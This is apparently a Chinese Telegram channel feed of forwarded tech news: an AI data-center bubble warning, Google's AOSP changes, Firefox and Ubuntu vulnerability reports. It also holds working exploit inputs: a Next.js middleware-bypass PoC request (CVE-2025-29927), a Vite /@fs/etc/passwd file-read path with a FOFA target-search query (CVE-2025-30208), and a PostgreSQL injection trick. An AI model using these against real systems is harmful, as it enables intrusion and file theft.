Forwarded from 科技圈🎗在花频道📮
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from 科技圈🎗在花频道📮
阿里巴巴主席蔡崇信警示AI数据中心建设或现泡沫
阿里巴巴集团董事长蔡崇信在香港汇丰全球投资峰会上表示,全球范围内的数据中心建设热潮可能正在形成泡沫,投资速度可能超出AI服务的初期需求。
微软、软银等科技巨头正投入巨资购买英伟达、SK海力士的AI芯片,阿里巴巴也计划在三年内投资3800亿元人民币。然而,部分数据中心项目在缺乏明确客户的情况下就开始融资和建设。
蔡崇信特别指出,美国在AI基础设施上的投资过热。仅今年,亚马逊、谷歌和Meta已承诺分别投资1000亿、750亿和650亿美元。尽管微软高管否认过度投资的风险,分析师已发现其取消部分数据中心租约的迹象。蔡崇信警告,当前的投资可能远超短期需求,需警惕市场过热。
彭博社
📮投稿 ☘️频道 🌸聊天
阿里巴巴集团董事长蔡崇信在香港汇丰全球投资峰会上表示,全球范围内的数据中心建设热潮可能正在形成泡沫,投资速度可能超出AI服务的初期需求。
微软、软银等科技巨头正投入巨资购买英伟达、SK海力士的AI芯片,阿里巴巴也计划在三年内投资3800亿元人民币。然而,部分数据中心项目在缺乏明确客户的情况下就开始融资和建设。
蔡崇信特别指出,美国在AI基础设施上的投资过热。仅今年,亚马逊、谷歌和Meta已承诺分别投资1000亿、750亿和650亿美元。尽管微软高管否认过度投资的风险,分析师已发现其取消部分数据中心租约的迹象。蔡崇信警告,当前的投资可能远超短期需求,需警惕市场过热。
彭博社
📮投稿 ☘️频道 🌸聊天
Forwarded from Eternal_安全内参
CVE-2025-29927/改良版Poc:
GET / HTTP/2
Host: target
Accept-Encoding: gzip, deflate, br
X-Nextjs-Data: 1
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Cache-Control: max-age=0
Eternal_安全内参
https://github.com/xuemian168/CVE-2025-30208 https://mp.weixin.qq.com/s/CzUYRRxnalT0fGJ7yFCssQ
所以在url后面加上一段路径就能读取任意文件...
CVE: CVE-2025-30208
FOFA:
http://xxx:xxx/@fs/etc/passwd?import&raw??CVE: CVE-2025-30208
FOFA:
body="/@vite/client"爱范儿独家获悉,Google 将不再维护目前 AOSP 的公开分支,逐渐关闭相关的的支持性资源,并可能停止更新有法定开源义务(GPL 等协议的代码)外的组件的源代码。#谷歌停止开源安卓##谷歌关闭安卓开源#
https://t.me/CE_Observe/38593
Telegram
每日消费电子观察
独家|#谷歌终止开源Android#
出于新闻报道和纯兴趣讨论目的,爱范儿对知名科技公司的战略做过各式各样的「沙盘推演」,设想了许多场景。
但没想到,最不可能的一种情况,居然正在 Google 身上发生。
爱范儿独家获悉,Google 将不再维护目前 AOSP 的公开分支,逐渐关闭相关的的支持性资源,并可能停止更新有法定开源义务(GPL 等协议的代码)外的组件的源代码。#谷歌停止开源安卓##谷歌关闭安卓开源#
海外媒体 Android Authority 最先报道了这一情况,Google 也确认了此事。…
出于新闻报道和纯兴趣讨论目的,爱范儿对知名科技公司的战略做过各式各样的「沙盘推演」,设想了许多场景。
但没想到,最不可能的一种情况,居然正在 Google 身上发生。
爱范儿独家获悉,Google 将不再维护目前 AOSP 的公开分支,逐渐关闭相关的的支持性资源,并可能停止更新有法定开源义务(GPL 等协议的代码)外的组件的源代码。#谷歌停止开源安卓##谷歌关闭安卓开源#
海外媒体 Android Authority 最先报道了这一情况,Google 也确认了此事。…
省流:美国政府被SQL注入黑了
postgreSQL在escape用户输入的时候不会escape字节0xc0后面的字节,所以0xc0加上一个单引号就能实现SQL注入
https://www.youtube.com/watch?v=rgsIkZkflMw
postgreSQL在escape用户输入的时候不会escape字节0xc0后面的字节,所以0xc0加上一个单引号就能实现SQL注入
https://www.youtube.com/watch?v=rgsIkZkflMw
YouTube
2 Bytes Was Enough To Breach The US Treasury
In this episode we'll explore a bug in postgres.
🐶 Snyk is free forever. Sign up with my link https://snyk.co/pwnfunction
🐤 X: https://twitter.com/PwnFunction
🐶 Snyk is free forever. Sign up with my link https://snyk.co/pwnfunction
🐤 X: https://twitter.com/PwnFunction
Forwarded from Abracadabra 魔曰
公告
由于 不 可 抗 力 ,本项目 暂时 Archive。
或许在未来能再次与各位相见。
某种意义上,我也算,完成了曾经认为不可能的设想。
https://github.com/SheepChef/Abracadabra
由于 不 可 抗 力 ,本项目 暂时 Archive。
或许在未来能再次与各位相见。
某种意义上,我也算,完成了曾经认为不可能的设想。
https://github.com/SheepChef/Abracadabra
Forwarded from LoopDNS资讯播报
Mozilla紧急修复Windows版Firefox高危沙箱逃逸漏洞(CVE-2025-2857)
Mozilla发布Firefox 136.0.4版本修复关键漏洞,该漏洞可导致攻击者在Windows系统上突破浏览器沙箱防护,且与Chrome此前被利用的零日漏洞(CVE-2025-2783)攻击模式相似。
来源:BleepingComputer / Firefox 136.0.4
Mozilla发布Firefox 136.0.4版本修复关键漏洞,该漏洞可导致攻击者在Windows系统上突破浏览器沙箱防护,且与Chrome此前被利用的零日漏洞(CVE-2025-2783)攻击模式相似。
来源:BleepingComputer / Firefox 136.0.4
Forwarded from LoopDNS资讯播报
Ubuntu Linux曝三处安全绕过漏洞 需手动缓解措施
研究人员发现Ubuntu Linux 23.10和24.04版本存在三个可绕过非特权用户命名空间限制的安全漏洞,攻击者可借此在沙盒内获得管理员权限,Canonical建议管理员手动启用内核参数并禁用部分AppArmor配置文件进行防护。
来源:BleepingComputer / 技术详情
研究人员发现Ubuntu Linux 23.10和24.04版本存在三个可绕过非特权用户命名空间限制的安全漏洞,攻击者可借此在沙盒内获得管理员权限,Canonical建议管理员手动启用内核参数并禁用部分AppArmor配置文件进行防护。
来源:BleepingComputer / 技术详情